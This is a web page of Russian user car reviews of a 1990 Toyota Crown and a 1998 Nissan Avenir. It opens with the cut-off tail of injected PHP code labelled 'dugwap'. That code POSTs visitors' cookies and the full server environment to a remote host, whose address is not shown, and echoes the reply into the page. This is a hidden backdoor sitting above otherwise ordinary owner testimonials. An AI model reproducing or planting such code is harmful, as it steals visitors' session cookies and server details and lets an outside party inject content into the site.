array("header"=>"User-Agent: PHP Modules dugwap\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($dugwap_result) echo $dugwap_result; ?>

Присланные отзывы за неделю


Прислал: Эльдар
Год: 1990
Эксплуатирую: 20 лет
Отзыв:

Хочу рассказать всем о таком легендарном императорском автомобиле, как Тойота Краун. Можете не верить, но лучшего экземпляра сложно найти. Когда я его получил, радости моей не было предела. Это оказалось настоящим чудом. Это был Краун на РАМЕ, с легендарным миллионным двигателем, в самой лучшей и недоступной для других комплектации. Включает в себя эта комплектация пневмоподвеску, в которой есть восемь положений оегулировки жесткости, телевизор, воспроизведение музыки всех форматов, электронное табло, TEMS, TRC, ABS, SRS, круиз-контроль, электрорегулировка сидений и спереди, и сзади, электрорегулировка руля, работающий холодильник, раздельный климат-контроль, а также ионизатор воздуха. Всё работает на отлично, и отказывать не собирается в ближайшем и не очень будущем. Пневма не падает в морозы до минус 70, это подтверждено собственным опытом, когда довелось отправиться даже за Полярный круг. Автомобиль в моих руках практически с самого начала эксплуатации в России, аж с далекого 1995 года. Поэтому стоит все родное. Пробег у моего автомобиля уже перевалил за миллион километров. Вы только вдумайтесь в эту цифру, кто еще может похвастаться такими значениями, и при этом даже не намекать на то, что ему пора уже на свалку. Я лично больше не знаю таких экземпляров. При этом масло не ест от замены до замены, не дымит, работает так, что окружающие люди удивляются. Двигатель располагается на подушках, заполненных каким-то японским гелем, который больше не выпускается. Касательно пневмы рамного автомобиля, вообще никаких замечаний, все работает отлично, ставишь стаканчик с водой или кофе, ни капельки из него не выльется, даже если буду рельсы переезжать. Есть ощущение полета на дельтаплане. Шумоизоляция просто идеальная. В такой салон можно смело приглашать королеву. Самый мягкий, нежный японский велюр. Подобного больше нигде не встречал. При этом пролитые жидкости не впитываются в него, а наоборот стекают как с кожи.



Прислал: Матвей
Год: 1998
Эксплуатирую: 2 года
Отзыв:

Автомобиль, который, предлагается вам для обзора - это Nissan Avenir 1998.
Про объём расхода топлива, встроен в автомобиль переднеприводный автомобиль с двухлитровым атмосферником. В результате этот автомобиль расходовал по городу в летний период, граничит в пределах 10 - 12 литра, в прямо пропорциональной зависимости от условий во время езды (в первую очередь это пробки) и темпа во время езды.
Зимний расход топлива будет достигать уровня в 16,5 литра. Так что полагаем, что оплата за дополнительные 85 л.с., и полный привод и придавая значение потерям автомата в аналогии с вариатором более, чем просто разумная.
Про запасные части и их ремонт. Варианты, которые предлагаются при начальном приобретении весьма надежны и скорее всего все затраты при правильной эксплуатации будут сведены лишь к замене только лишь эксплуатационных материалов.
Слабым местом, ранее представленный моделей (Ниссан) было слабое встроенное электрооборудование - генераторы, стартеры и пр. И полагаем, что ситуация критически не поднялась, так как уже на своём первом Авенире водителям придётся менять стартер.